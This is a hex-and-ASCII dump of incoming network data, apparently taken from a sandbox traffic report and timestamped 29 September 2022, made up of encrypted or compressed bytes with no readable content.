                                                                                                                                                            2022-09-29 12:45:02 UTC8243INData Raw: 9c 22 0b ba 54 20 80 e2 5c 3a d9 f1 4c 51 58 fd 68 7f 72 31 56 56 f7 2d 46 99 41 5c c1 a3 c8 eb 98 28 bc 5e ec 21 59 6b 75 53 f0 9b 81 c4 06 a4 18 00 8e 45 8e d0 51 c2 5e 18 76 02 73 58 7e 31 3d 1e 12 d2 18 a2 f7 f8 be 66 a8 05 e6 ed e7 a0 c8 6b 1f c6 4e 5b 21 6f b2 ab 05 93 99 0d 5c f0 e4 fb cd e5 51 06 9f 63 d6 39 c9 aa 8f cc 29 8b 67 f6 81 e7 64 cb c6 66 27 97 40 65 82 14 40 38 8c 6b bc 30 f2 b4 7d 09 26 cb cb 41 f6 e2 7e 5f e7 69 9b a0 be 7d e4 03 b4 73 e1 67 0a 30 07 1c 0b 22 29 c6 04 48 70 87 56 d5 2c 0d d4 5b 23 e3 e7 7a c1 26 4d bc 6a 26 12 ff 8d ed e0 04 02 ff bd a5 3b 6e 95 f2 01 0d a3 f7 d8 54 97 9e 10 8a f8 07 1d ab 42 92 a7 23 70 49 ba fd e2 e5 88 d6 b3 19 92 73 2f a1 96 18 2d cc ec 87 2a 5b 86 bc 3c 90 8a 48 9d 5d ae c2 d4 27 49 61 ee 0c f7
                                                                                                                                                            Data Ascii: "T \:LQXhr1VV-FA\(^!YkuSEQ^vsX~1=fkN[!o\Qc9)gdf'@e@8k0}&A~_i}sg0")HpV,[#z&Mj&;nTB#pIs/-*[<H]'Ia
                                                                                                                                                            2022-09-29 12:45:02 UTC8259INData Raw: 6c 45 dd 24 f7 9f 58 58 b2 05 1e 45 1a 86 4c 59 cf e7 11 0d 7c 5a 8a 2f f7 6d 15 6b a2 22 89 6a d4 f4 5f 71 df d3 d6 28 ce fd 4d 80 8d b6 ff 6e cb 4e 46 df 17 67 f8 bb 8b 17 53 50 32 6d 48 f7 41 7a e2 3a 87 c5 8c d7 b9 17 17 56 0f 1d 43 85 65 f4 a6 03 56 13 b5 19 62 3b ce 4e 8a 5a 73 02 be 89 3f fb 79 ab 5e ec e6 30 52 b0 bc f5 c4 1a 9d fb 30 d9 f0 f2 5d 5e d6 71 bb 4c 21 a2 78 21 5e fd b5 7a 77 53 1c d5 7c c9 8c 44 98 76 43 bb 2f fa 70 33 aa ef f0 e1 a0 c7 5f de 0b 01 bc 5a db 90 e3 c3 82 57 f1 6b cf 4e 76 c8 b8 cb fe ce 7b 2e 5e 3b 29 6f aa 9f 07 95 c9 2c ec 6a ef 63 09 3f 93 50 f7 e8 f4 91 bf ea 27 f9 22 7b ed 18 17 0b 7f 87 b3 5b 8d cb e9 13 1a fc d6 33 b1 a7 8d 8c a4 15 60 7c 8a c7 19 2d 4b 3b fa d1 cc 7b 5f 9e 7a 54 64 83 14 f7 55 06 4c c8 31 23 f1
                                                                                                                                                            Data Ascii: lE$XXELY|Z/mk"j_q(MnNFgSP2mHAz:VCeVb;NZs?y^0R0]^qL!x!^zwS|DvC/p3_ZWkNv{.^;)o,jc?P'"{[3`|-K;{_zTdUL1#
                                                                                                                                                            2022-09-29 12:45:02 UTC8275INData Raw: 30 4d 7d 51 35 ff ff 55 fa 0a c6 9d de 9d 78 e8 5b 92 b3 ca 98 af 05 c8 09 2b ed 2a a7 b4 38 7d 84 25 c9 c5 c8 a2 d4 db 4f 8d d0 6c 93 51 ec b5 c9 a8 aa 31 22 2e b5 14 93 84 c4 bc ba 9d 62 b0 38 23 ff a8 77 53 10 46 41 bf 20 00 6e 80 4a a8 5a 45 77 8f 14 17 1f 92 da 28 f9 3d 08 cd 18 c9 9e 85 43 4a 67 bf 3e f9 d4 0f e6 31 56 0d c2 da c1 db ba c7 c1 8f 84 1b 72 c7 ab 1e f2 1d bf ef c1 74 e6 29 87 8c e5 77 f5 8c 96 3a 68 17 66 47 62 8c c4 ea f1 53 0b 9b ae f6 73 c1 64 05 e6 5a 1b b6 89 2f 05 98 62 bc a5 3f 48 fd 19 dd 9b fe c1 7c 1f 4b 68 9f d8 92 6b 14 cb 3c f3 28 ed 2c 54 29 aa 1c 9e 39 db 09 d0 5f 9e 61 7e 83 15 f0 f9 fc 21 f3 f4 1d c4 09 a2 6e 43 58 30 5b 74 b8 48 be 36 1b 4d e0 82 07 46 2b 96 a8 94 17 0e 73 de ae 0e 3b a8 a4 2d fe 00 45 3e 61 70 53 02
                                                                                                                                                            Data Ascii: 0M}Q5Ux[+*8}%OlQ1".b8#wSFA nJZEw(=CJg>1Vrt)w:hfGbSsdZ/b?H|Khk<(,T)9_a~!nCX0[tH6MF+s;-E>apS
                                                                                                                                                            2022-09-29 12:45:02 UTC8291INData Raw: d3 b8 4f 73 81 9e 6c 18 96 7e 14 ab 3d ff ca 96 18 78 9c b3 fd b2 82 14 eb 50 55 87 a1 21 75 8c ca fc 73 0b 98 a9 20 51 ea c5 8f f7 65 3c d5 af 29 59 8a f2 78 63 a7 ce 8a 1d 7b c0 37 83 82 4b f8 6f f1 13 41 63 db 19 71 1b 9c a2 d8 f0 70 b3 c5 36 82 34 58 20 a4 9d 16 eb ad 2d 39 a2 3d e0 cb 53 35 18 46 11 86 d8 76 ff d5 73 5e b7 35 f6 da a7 b7 da ed 39 ca 6a 7b 94 e6 5f 67 2b 33 35 fd ee f7 39 4a b0 c0 a9 b9 de 1c a0 2b 1e c0 5b 0f c2 06 5c 2f 77 a0 8c a1 f1 e4 7a 5c b7 b3 12 61 da 26 eb 87 b8 c3 2c 95 15 5f 2c 8f 62 19 b1 b5 aa 66 61 2c da 99 4a ce 70 54 0e 80 f7 ba e5 5b 2e 2e 91 11 db d4 23 e6 99 5e 35 cf 7b 16 74 30 96 c6 e5 ab 1a 9e 59 6f 28 a6 d1 15 0e a3 b7 23 ed e1 e6 b0 6b be bd 91 b6 ea 6c f2 1e d5 02 c7 d2 ae 86 7d e8 ac 8b d5 07 2c 20 ab e7 b6
                                                                                                                                                            Data Ascii: Osl~=xPU!us Qe<)Yxc{7KoAcqp64X -9=S5Fvs^59j{_g+359J+[\/wz\a&,_,bfa,JpT[..#^5{t0Yo(#kl},
                                                                                                                                                            2022-09-29 12:45:02 UTC8307INData Raw: cf 7e bc 50 c6 3c 48 50 43 01 fc 69 4d be c7 e1 4c 2d 94 d9 ed 5e c1 73 5b 5d b1 a9 c1 98 1c 28 2d b5 d9 61 90 9f 6d 83 90 ae dc 40 c6 af 3e f8 ed 94 4c 8f e3 1a b4 69 86 20 28 1b f1 d3 76 7f 06 94 14 fc 29 54 1a 19 73 5b f6 50 a6 89 89 6d ef fc a1 9e 2d bd 31 c2 a9 e6 91 50 a9 de 4b 11 3b 33 53 9a dc a4 53 1d fb f4 fe 0c 94 2b 21 a4 7d 6d aa 2e f6 00 c4 3a c6 96 f5 5d f4 96 33 94 ee 3b 60 8c 05 2b ef 03 1c 3d da e2 9b 7d bc d3 41 67 af fc 9e b0 84 bc 33 57 44 1b 6f 4b 15 a5 de 93 60 00 78 e9 f1 f0 cb 34 c3 21 b9 47 cb 0b 42 de 67 48 db 3b 46 89 a2 8c e3 70 c3 58 e7 cd b5 0b fd 4a 76 b1 3e d4 e0 a0 72 28 d2 d3 2f f1 02 97 1f b3 91 59 86 d8 03 a0 dc 1d 79 1f 89 9a d8 5a 08 0b 22 01 91 7a 96 f7 e7 31 33 0a 6a ac c2 81 5a 07 26 fe 08 40 37 a5 9d 09 8c c6 db
                                                                                                                                                            Data Ascii: ~P<HPCiML-^s[](-am@>Li (v)Ts[Pm-1PK;3SS+!}m.:]3;`+=}Ag3WDoK`x4!GBgH;FpXJv>r(/YyZ"z13jZ&@7
                                                                                                                                                            2022-09-29 12:45:02 UTC8323INData Raw: dd 3d 3b 1e 46 c1 45 f1 3b 75 2c 0e 6a 91 91 0d e0 91 f1 6e a2 5e a3 fb 4f 36 04 da 73 4f 4e 83 21 73 de 0d 93 81 0c 71 d9 2d 33 75 ba 3c 63 ab 4f d0 92 aa 6f 24 78 72 3d 0e 2b fc bc 87 e8 d8 12 37 c5 92 c4 91 73 32 3f e9 d1 7d 2c 87 69 8b 4d b2 b4 37 d1 e5 61 02 b8 37 19 9c 6b 3d 01 37 69 a0 0f aa 4b 2b 33 8f d0 ff 13 a4 0f 11 82 45 4d f5 dc e0 2e fd 59 c9 76 5a 5c 72 84 39 92 13 53 12 73 37 56 4f 96 bc 53 82 9b 16 2d 72 0e 35 f3 bc 51 e7 5e 95 24 f2 47 23 bb f6 2c c1 9e d6 49 e5 f6 a9 84 f3 d1 19 cd be 82 fb ac 9d cd 62 13 9c f4 db a4 38 4c 62 7d 17 c0 78 c2 a9 76 f1 aa 3f 9e f1 c5 c0 88 51 32 a4 33 55 42 2a a3 11 65 af fb 91 5a 08 09 bc 07 6b 1c e5 74 32 1d aa 62 ae 5a 77 3d eb eb d3 4f 01 af c6 8e 88 2d 3b 6b 54 a0 d7 9e a1 c2 a3 44 62 e3 fb b3 99 d1
                                                                                                                                                            Data Ascii: =;FE;u,jn^O6sON!sq-3u<cOo$xr=+7s2?},iM7a7k=7iK+3EM.YvZ\r9Ss7VOS-r5Q^$G#,Ib8Lb}xv?Q23UB*eZkt2bZw=O-;kTDb
                                                                                                                                                            2022-09-29 12:45:02 UTC8339INData Raw: 08 83 76 f8 83 7e cc c5 6e 6f 40 9b 6f 24 b1 68 74 39 be 37 95 8a bb d2 84 63 ad 8a ab d7 f5 69 d7 3d 78 04 e4 7f 93 38 b1 9e 46 e0 29 82 1d 19 6c 9a 78 ae 29 ac 97 58 79 c1 53 11 38 e4 d2 c1 04 a5 90 1e 3c ef 32 a5 d8 87 33 59 f5 7b 0e dd 6b e1 09 d5 52 18 72 8d 94 ff bf c9 74 84 a0 12 da 28 86 0d f4 87 93 bb de 7d ab d0 ed f8 f6 7b 91 ff b9 8e 9b af 24 4d b7 ec f7 55 b9 27 f1 d6 71 e1 78 9c a3 6e 8b 2e e1 d3 fb 46 f4 14 93 60 30 d9 ba 5b 45 7b b4 bf 64 52 a4 e3 ac b0 aa c5 aa ee 99 d9 e5 84 d6 4e 7e e1 57 f2 2c a6 40 5c 37 f9 ee 79 af 53 f4 6f 90 5c 41 f5 35 ea 38 35 35 89 2b 3b 58 d4 1c 45 08 dd 68 89 a4 8f 53 6e 49 18 97 56 04 e3 6f da 84 98 f0 ac 1a db f5 e3 55 cf b2 9c ca 27 b6 4d 6f 7a 58 d4 f5 2e 58 2c e1 6a 34 1f 2a 9b c9 81 6e 72 a6 c4 41 d4 83
                                                                                                                                                            Data Ascii: v~no@o$ht97ci=x8F)lx)XyS8<23Y{kRrt(}{$MU'qxn.F`0[E{dRN~W,@\7ySo\A5855+;XEhSnIVoU'MozX.X,j4*nrA
                                                                                                                                                            2022-09-29 12:45:02 UTC8355INData Raw: be 7c a0 9c 53 b9 be e6 6d 9d a2 37 d3 83 19 5f 29 88 90 8e 45 db d0 c5 d4 ef 12 56 33 6a 8e 6d 82 65 69 24 e4 af 2a db b2 b9 aa 0a b7 6a 37 c5 0b b8 26 6f 32 b5 78 0a ff 0f 4b f1 51 52 f7 41 7f 1f b8 77 dd 83 d2 3b eb 7f b7 12 64 1b ef 98 cc 48 72 39 0f e1 c4 22 2b 93 ca c0 da ca 1e cf 9b c0 e4 fa 47 f2 29 c8 04 72 fc d5 a8 3b 0a 24 65 1d 73 72 12 6f d4 44 18 09 c0 b1 fc 56 3b 8d be f8 e7 8d 4b 88 c2 16 35 2b 1c 03 ac cf e0 84 b9 b9 a1 c8 6e 39 3b f3 d0 ff 56 cd 1a 66 09 ce 30 2e ff 82 d3 56 bd 9b f4 cb 77 b8 66 61 c5 07 0e 09 8f 9c 84 66 f8 a8 6e 28 f5 2e da 2f 6c 17 23 80 cc 90 32 d4 26 b3 20 4a e0 72 9e fd 89 0b 41 ec ea 35 8f fc 52 52 6f 0d 19 46 6c e4 34 a8 73 2d 41 33 93 a6 4d a0 85 df 09 28 f5 13 2b 14 3e bf b2 29 d1 83 24 94 65 d3 48 cc 2a d2 15
                                                                                                                                                            Data Ascii: |Sm7_)EV3jmei$*j7&o2xKQRAw;dHr9"+G)r;$esroDV;K5+n9;Vf0.Vwfafn(./l#2& JrA5RRoFl4s-A3M(+>)$eH*
                                                                                                                                                            2022-09-29 12:45:02 UTC8371INData Raw: fa 4c c2 4a 82 52 04 13 1f 50 a8 68 5b c1 07 23 f5 e3 78 4f 64 90 28 1a 50 20 9e d3 74 a7 53 50 49 40 db 74 46 89 54 99 53 d2 d6 04 d5 6f da fe 75 18 32 67 6a e9 a9 a2 3c 71 fd d7 65 a3 6c ef 0c 2a a0 ae ee 0e 6f 7b 5d 1a e7 08 42 48 e4 ba 9b c5 fa b2 77 02 4e d1 0a fd 43 f7 2b 33 f0 f1 1f 91 ec a7 69 56 41 3d 55 e8 ca 30 f4 cf 24 7c 96 7f be 67 6b 05 52 f5 cc 63 b3 af d2 c3 6d f5 d1 f4 fe 47 51 d9 92 1c 29 d3 26 45 3f d6 a6 14 9b a4 bd 2a ed 8b e3 7e ac 61 50 51 ed 75 1e b2 5c 50 ad 91 fd 6b 8f cd c8 36 37 92 38 f4 df 22 77 8f 82 c5 bc 63 d4 05 55 ed 1b ce d9 42 d5 c7 3d 8c 4c 68 94 77 0c ff 26 20 d9 3f b9 20 f9 da 76 12 ab 35 cc 1a 25 4e bf 0e d3 80 5d 6d d8 09 71 de 2f 66 40 e4 60 95 fe 9e b2 34 1d 8d db 22 d0 50 e9 45 85 6e b0 b7 ac b1 54 ac e6 55 ba
                                                                                                                                                            Data Ascii: LJRPh[#xOd(P tSPI@tFTSou2gj<qel*o{]BHwNC+3iVA=U0$|gkRcmGQ)&E?*~aPQu\Pk678"wcUB=Lhw& ? v5%N]mq/f@`4"PEnTU
                                                                                                                                                            2022-09-29 12:45:02 UTC8387INData Raw: 7b 47 a2 0e e3 b6 99 0d 14 1e d7 a9 f0 6b 94 45 3b b7 47 23 a1 1a 1f 31 70 ba 29 90 59 d3 7f 17 f3 3d 54 ab 0a 22 06 7a af 4b bb 29 c5 00 09 d0 60 42 cf 7d fd 51 ef 3e 52 71 b3 bf 0a b9 a4 86 f9 da 9c 58 bf 82 dc df 7a 75 70 f7 5f 3c fb 93 ce 7c 0b 36 9e 19 b1 17 94 eb 32 92 cd e6 ab c1 44 9e 7f 46 9c 16 eb fc 24 16 a1 d4 66 b4 98 ca 45 08 6f 91 db 9a 9c 2f d4 d2 3d 45 a0 37 7f 2d c1 ce 17 75 1a 4a b1 d3 02 5d d9 2f 16 48 41 93 d8 21 64 71 aa bc 56 61 2f 5a b5 8f 40 2c 6d 2f 8f 52 e5 bc 38 e8 91 9a 21 92 bc 4f d7 ec 66 2a cd e2 a2 c8 4b 42 85 95 65 31 d1 6f c1 f9 50 3a 96 0c d8 07 a5 f9 f1 ad ab 7b 83 56 13 b0 8e 88 fd d3 ed 00 11 d0 50 bb 8a c0 26 23 c8 23 d1 40 16 fd 9f ca 90 80 de fe eb b9 e2 38 04 70 26 87 fd 9f 45 c2 9d 35 94 d8 6c 01 4c 79 b6 94 a1
                                                                                                                                                            Data Ascii: {GkE;G#1p)Y=T"zK)`B}Q>RqXzup_<|62DF$fEo/=E7-uJ]/HA!dqVa/Z@,m/R8!Of*KBe1oP:{VP&##@8p&E5lLy
                                                                                                                                                            2022-09-29 12:45:02 UTC8403INData Raw: 93 e5 8b 53 b5 ef df 5e 36 cb 73 6b d3 90 f4 47 03 ae 46 a7 2e ff f1 50 12 d3 ef d2 2b 9b 3e 6f 8d fa 2b 84 76 e4 08 3d 11 35 34 01 58 d8 89 59 63 a2 23 c4 77 3e de 40 0d 18 78 72 c7 e2 7c 26 a7 e7 ad ea c4 bb c6 a3 99 fb 39 65 bb 84 3d f0 ed f5 d5 98 2b b4 e7 77 01 fe 35 bd eb 2c 64 57 db 61 f7 2b a7 d3 78 cb e9 af 0a e8 7a 9b 0d fb 9a 00 e5 da e0 bc 07 00 01 d2 c0 4f 96 be 2b 3c cb 49 29 06 fd bc 3a e3 c5 10 b8 26 f5 42 33 4b 19 29 f1 71 ce e8 b4 29 64 ed b3 1c 7e 26 34 40 d0 81 33 7d b9 f2 2b 6c 92 fe 21 c3 dc 11 f4 50 48 5e 3b 35 0d bc e9 dc 43 e5 0b 1f 10 a5 57 bb 42 78 6d a7 54 3f 8f 0a 1b a3 cb b3 c0 01 7f f9 9a ec 5f 1e c1 c2 bb 63 bf 4b 48 ea 35 c0 8e c0 4c 3f 65 6b 35 09 13 1f 2e 38 b8 25 9e b1 b1 01 ea 80 ce fe 36 1c 41 8b b5 f6 9f 2c 8a 24 e0
                                                                                                                                                            Data Ascii: S^6skGF.P+>o+v=54XYc#w>@xr|&9e=+w5,dWa+xzO+<I):&B3K)q)d~&4@3}+l!PH^;5CWBxmT?_cKH5L?ek5.8%6A,$
                                                                                                                                                            2022-09-29 12:45:02 UTC8419INData Raw: cf 5f d7 45 da f0 ba 2a 84 86 59 03 f5 1a ea 46 72 88 9f 9d 10 03 d6 73 6b db 8a 7f 60 ce 5e 02 a7 62 ef 9d 4b a0 b0 0a f2 ec f8 17 f5 76 ae 03 54 13 b5 14 57 b3 b8 18 c6 aa 2a 7f 89 66 a6 a6 41 33 0c 19 65 a6 83 48 9a 3c ae 60 da f5 a5 29 3d d7 b5 2e 0a 63 f9 30 20 34 22 c5 64 ed 23 74 7f 5a 82 5b 76 2e 76 4d 68 f8 a4 59 25 c6 e1 21 c8 8e 2f e0 ce d3 34 97 f3 a3 3c 70 da d4 a2 fe d5 85 51 ca 85 0a de f9 f2 33 b8 7b 7b d2 54 54 58 72 4b b0 7f c8 48 2b e7 52 42 03 7f d8 2d a6 4d 8b 83 93 6b 65 76 6b 82 9a 33 e2 de 20 9b b5 7f 10 3d 7f 9d cf 09 ed 8a 49 6e c2 1f db fc 69 cc 8a 83 b6 cd 04 38 1c 59 41 0a ab 53 57 8b 42 3f 7e 08 43 9c 93 b5 24 33 9f b4 bc da 92 b8 d5 94 90 fb 51 aa 92 0b 2f 98 83 27 a3 ad 1e 00 84 3a eb 41 dc 2b ba 24 b6 82 3f f1 6c c1 43 4e
                                                                                                                                                            Data Ascii: _E*YFrsk`^bKvTW*fA3eH<`)=.c0 4"d#tZ[v.vMhY%!/4<pQ3{{TTXrKH+RB-Mkevk3 =Ini8YASWB?~C$3Q/':A+$?lCN
                                                                                                                                                            2022-09-29 12:45:02 UTC8435INData Raw: ab d7 ba 31 f7 83 0e c7 95 87 01 bb fb b7 9c 5a 4a cd dc 7c 74 5d 91 64 f0 9d 78 cb 60 a7 80 40 56 c3 de 27 c5 0b 37 40 1b d6 4d f1 91 16 a1 68 21 55 64 72 4f 79 d5 ea 2e 22 e1 4b b5 f2 f0 ff f6 b8 c1 0e 55 2e 2f 6f d3 25 2a a4 b9 2c 2a b7 f5 9d 86 69 54 eb d9 bb 98 1d 0d cd 18 ae 4a 7a b2 7d d1 80 c8 16 6a b7 d5 11 6d ac 7c ac a2 fd b6 06 02 ae 7e d7 dc a9 ec e3 f2 ea 25 c7 e5 a4 fe 51 59 f5 46 5a 18 cf 10 8f 3d a9 fb a8 9f 64 84 82 53 17 03 88 51 67 15 2e 2a e1 fb cc 09 c1 00 bc 85 9f 6f f4 51 d6 0d 30 2f 5b 17 38 04 cd b1 13 ad 5c 56 89 9d b4 03 f1 16 a2 b9 e3 06 93 c4 ec 85 57 96 a5 d4 64 f4 7a 16 1e 5e 30 4a 70 49 73 d6 6f 0c 6e c2 c0 68 6d 09 26 f6 19 0b d1 ba cb c4 15 41 f4 69 a4 66 b0 88 7b aa 0d 83 34 d4 3d 70 a3 84 fd bb b3 38 0a 8b 7d 9d 14 9d
                                                                                                                                                            Data Ascii: 1ZJ|t]dx`@V'7@Mh!UdrOy."KU./o%*,*iTJz}jm|~%QYFZ=dSQg.*oQ0/[8\VWdz^0JpIsonhm&Aif{4=p8}
                                                                                                                                                            2022-09-29 12:45:02 UTC8451INData Raw: 69 13 2b f0 69 89 bb 85 9c 1c 0d d5 fc e5 3d d5 97 61 76 ba da 7f ef b5 b4 3e 26 14 9e a6 d8 9a 09 77 34 59 0d 8b bf 3f 28 7b 9c ec 95 d6 9a 20 6f c6 f5 83 86 bf 6b 50 d4 79 ba f8 3a de 6e 58 84 4d 75 79 6d e9 34 5f 97 cd a6 df d4 b1 37 b4 6d 59 e3 9f 63 6a 2b 60 cc 67 b8 cf 22 28 1d fe 80 9c c8 73 2a 50 3b 9c 87 26 01 23 74 9e 82 de d8 ee c1 db 54 73 1c 21 4b 51 bb 3d da 61 e8 d9 9f 39 f8 c5 23 ac fd dd ea cf ad cd 83 a4 9e b3 51 84 f3 3f ea f4 cd 12 d7 58 7f 3c fc 29 16 c3 4e e0 09 82 3f 92 09 37 17 b2 6f 36 e9 48 91 47 95 54 ca ba 17 d2 84 85 ca ae a6 b1 3d 43 7f e1 0c 62 26 af 40 9d f8 9d 41 0a e4 31 b6 13 99 fc ef 75 52 a9 1f 6f 69 7a 67 35 22 3d 72 ac fd fe 5a 9a f2 31 e7 3d 61 74 69 bd c2 d2 83 59 88 26 10 3b 2c 57 7b 49 51 05 28 41 55 1c 88 e3 17
                                                                                                                                                            Data Ascii: i+i=av>&w4Y?({ okPy:nXMuym4_7mYcj+`g"(s*P;&#tTs!KQ=a9#Q?X<)N?7o6HGT=Cb&@A1uRoizg5"=rZ1=atiY&;,W{IQ(AU
                                                                                                                                                            2022-09-29 12:45:02 UTC8467INData Raw: 64 3b cb 44 c6 40 79 2e 54 50 e2 4f 12 41 af f3 68 33 87 e8 f3 ac 8b c3 e6 b7 c8 cd c5 8e a2 df 69 83 b9 b3 45 d7 d6 ca 7c 29 b4 3b 63 83 2e 7b 00 30 f0 c1 97 3d 62 0e ce 12 80 c7 d1 a3 a8 77 76 f5 0f 0f ff cd bf fd 1b 3b a5 fe d1 0b 23 d4 6f 05 0f 26 e7 46 b3 1f 86 21 89 de 08 4e b6 70 f7 49 bd 1d 92 0c 43 79 ae 26 88 6b 76 4b db d9 77 d4 61 bf 7d b3 ec d6 8a a7 f9 4b e5 c9 a3 2c 43 5f 3f cf 7a 07 fd 02 85 41 4e 2e 92 13 40 c0 10 eb 85 a1 e2 ab 93 0b 43 bb 7f 5d 17 dc 29 13 0a 5a aa f8 b9 ca 82 8f 9b 81 c7 9f 72 64 7d cc d2 f9 8f 68 9e 4b 95 65 ad 45 5d d5 d8 e5 d5 b5 2d bb 0d 66 61 93 06 4f 3d 9f c6 8c 66 e1 7e f2 06 b6 2c f6 00 c0 2a 6d 2c a9 4a 92 a9 7c a3 7b 18 77 81 ea 67 cd 82 e4 5c ad 24 cc 00 26 7e c8 a3 30 05 f6 7b e4 24 d2 b8 02 f0 46 b2 05 59
                                                                                                                                                            Data Ascii: d;D@y.TPOAh3iE|);c.{0=bwv;#o&F!NpICy&kvKwa}K,C_?zAN.@C])Zrd}hKeE]-faO=f~,*m,J|{wg\$&~0{$FY
                                                                                                                                                            2022-09-29 12:45:02 UTC8483INData Raw: 6d 22 c4 d1 53 d8 bc fe d8 58 03 ae 1a 91 da 38 4f 18 3c ca 73 bf d2 6d d8 7d 14 33 af 94 09 f4 df fe f1 a2 f6 56 6d ae 61 9e 5a 1f ea 49 f8 a2 6e dd 2f 94 f4 ed df 92 51 1d 59 35 81 a5 1e fe 31 a6 f4 5f a9 76 c6 61 5c 31 41 b2 6c 29 5f 0a 51 13 7b 1c b8 c5 6a ff 7c 33 c8 5f 32 4e 0c 12 82 0b 47 63 20 a5 74 d9 ee d1 7c c2 f0 98 a6 2e c0 5f 45 21 f3 91 18 f8 08 a9 f1 45 63 24 46 e2 e6 d4 29 ef 39 e4 b1 fa 9d f9 de 62 22 1e 23 12 bd b3 e0 94 fa 23 4a c9 3f dc 5d c3 ef 73 0d e7 f8 f6 14 e3 a8 3b 68 ea ed c1 c8 03 b3 aa fe 17 5e bc 7a 61 2d 4e 0f ac 25 b0 1a 95 10 08 f4 14 e9 42 cd 0d 6a ec 11 8e c9 77 3e 97 88 d9 a7 d2 dc e4 8e d4 81 af 66 c2 05 1d 6f d5 96 ad fb 41 55 94 c3 4d 5e 0e df 5c 3d 98 0c 6a df 65 7a 5f 1f 3b 01 21 45 b9 78 fe 68 b2 a3 58 6c 3f be
                                                                                                                                                            Data Ascii: m"SX8O<sm}3VmaZIn/QY51_va\1Al)_Q{j|3_2NGc t|._E!Ec$F)9b"##J?]s;h^za-N%Bjw>foAUM^\=jez_;!ExhXl?
                                                                                                                                                            2022-09-29 12:45:02 UTC8495INData Raw: 94 39 89 f6 74 d3 0d 8e e3 5b 43 aa a9 3b 8f f7 8d f9 53 87 05 96 ae db 78 01 6f 9f 22 ec f0 08 09 06 07 02 b3 30 bc 10 38 9b 54 a8 f6 9b ca ad ee 68 4e 86 99 0b 13 1f 71 4c 47 8b eb ef 59 0d ad 9b 4f ed ae 6b ce 78 96 34 3c b1 c4 24 50 fb 35 31 92 b1 0a 52 9e 19 d4 f3 22 6f 12 c8 4b 7a 6d 03 35 eb 94 44 5a 19 60 55 e3 f4 fd a6 d9 35 2c 0b cb 61 8a 55 21 7f 53 b3 d5 d9 de ea 68 50 be 3b b9 4b 4b 24 d6 dc 69 40 9a 26 bd 3a 96 b9 d2 4c 10 14 05 d0 6a 26 1b 01 e5 51 2b e0 d4 e7 d6 9a 4e d6 2f b8 d6 e9 b8 59 d7 58 b9 e2 43 24 78 21 5b 23 51 28 8a 3c 3e 0d 82 ee d3 9e ac 1a cc 3c a4 9c b7 de 98 02 54 e8 31 da 23 c6 57 b3 5f a5 45 f5 ad 51 2f c5 c2 16 d8 a8 24 bd f3 c1 41 8b 0b 61 0e 22 e5 66 28 cb d3 a2 9d f9 16 f8 c1 e9 80 30 13 01 00 61 9b 3e 4c e3 cc d7 d0
                                                                                                                                                            Data Ascii: 9t[C;Sxo"08ThNqLGYOkx4<$P51R"oKzm5DZ`U5,aU!ShP;KK$i@&:Lj&Q+N/YXC$x![#Q(<><T1#W_EQ/$Aa"f(0a>L
                                                                                                                                                            2022-09-29 12:45:02 UTC8511INData Raw: 96 bf c9 80 68 52 de a9 64 10 38 95 78 5b 7a 2b 6b b1 73 77 aa aa 01 25 16 66 65 ed 4d 8e ad c1 79 9c 33 b7 18 67 60 65 69 7d c3 f9 bf 45 d0 61 01 84 d7 88 2e aa 00 9f b5 a8 41 1b f1 1b d2 84 52 78 a3 8c 8f 27 79 9c 60 79 f2 7a e0 31 bd 11 ed 2d 15 52 5c c0 f7 90 03 6b ba 3b 55 5a bb 5c 3c 89 9c fe c6 83 a2 94 76 28 32 0c fa 95 65 96 a3 0c 35 1d 88 b1 ab 6f 3d db e5 52 33 a8 55 0c e8 f1 6d c0 d2 fc ee 01 41 f9 ff f4 93 0d 6f 8e f9 fb 24 5f c5 d9 8f 78 45 72 04 e2 f8 07 b4 d0 65 25 15 02 94 51 e3 90 5d f3 c1 67 76 1b c4 0c 22 22 7d 9b 3d 64 80 41 30 ba 3b 10 1c 28 99 2f f0 51 f3 17 2f 34 4a 14 7b 26 91 e0 08 36 d6 b3 f1 dd 94 75 60 f4 5e 47 4e 2c 9f a9 89 1b d7 61 38 b3 77 7a 36 eb 50 39 f7 33 e5 8e 30 b7 c6 97 0b 4b 6d c5 8f 1f af 30 e4 d7 b3 6b b5 58 90
                                                                                                                                                            Data Ascii: hRd8x[z+ksw%feMy3g`ei}Ea.ARx'y`yz1-R\k;UZ\<v(2e5o=R3UmAo$_xEre%Q]gv""}=dA0;(/Q/4J{&6u`^GN,a8wz6P930Km0kX
                                                                                                                                                            2022-09-29 12:45:02 UTC8527INData Raw: 63 c2 b2 f8 43 9b ee c5 49 8c d6 68 63 cd 7a ca 84 1e 71 5a ae 0f 37 c5 2e 70 6f a5 85 60 97 e0 7b 00 db 61 aa ed e4 5b 8d b4 0d 75 de 1b 5d 32 5f 96 b5 40 6f f8 53 37 ea 62 bf 85 7e 31 15 74 02 50 ff c8 d2 05 eb b7 6f 45 22 88 39 12 61 6c 9f 91 f9 e1 65 48 3f 40 c9 ee 34 f8 47 7c 2b ce 58 25 69 7d b5 9b 39 16 c0 a2 36 a4 1b eb ff 75 dd 98 96 e3 70 0f 11 5a 1c a2 dd da 05 69 34 55 cb cb ef 7d 8d 31 4d 17 bb 0e d8 75 27 c3 e3 92 99 4c d7 47 3d af 5b 18 8c 8a 80 b1 ac a4 af 2d 65 9c 3a a0 da 91 c3 80 ef e8 c0 6e 24 53 a2 78 22 df ff a9 7d 5a dc 8e 42 36 38 ed 8f 7b ee 11 4a 9b c6 17 07 41 b1 47 31 ff fe eb f5 80 c1 0a 47 e2 45 51 f2 36 b0 15 47 ee e1 40 87 80 90 d4 83 07 fa fc e7 d2 aa 22 0a 48 84 70 60 44 7c 72 4e 6b 9d ab 2c 6d 6c bf 5f 9f ff f7 14 46 6c
                                                                                                                                                            Data Ascii: cCIhczqZ7.po`{a[u]2_@oS7b~1tPoE"9aleH?@4G|+X%i}96upZi4U}1Mu'LG=[-e:n$Sx"}ZB68{JAG1GEQ6G@"Hp`D|rNk,ml_Fl
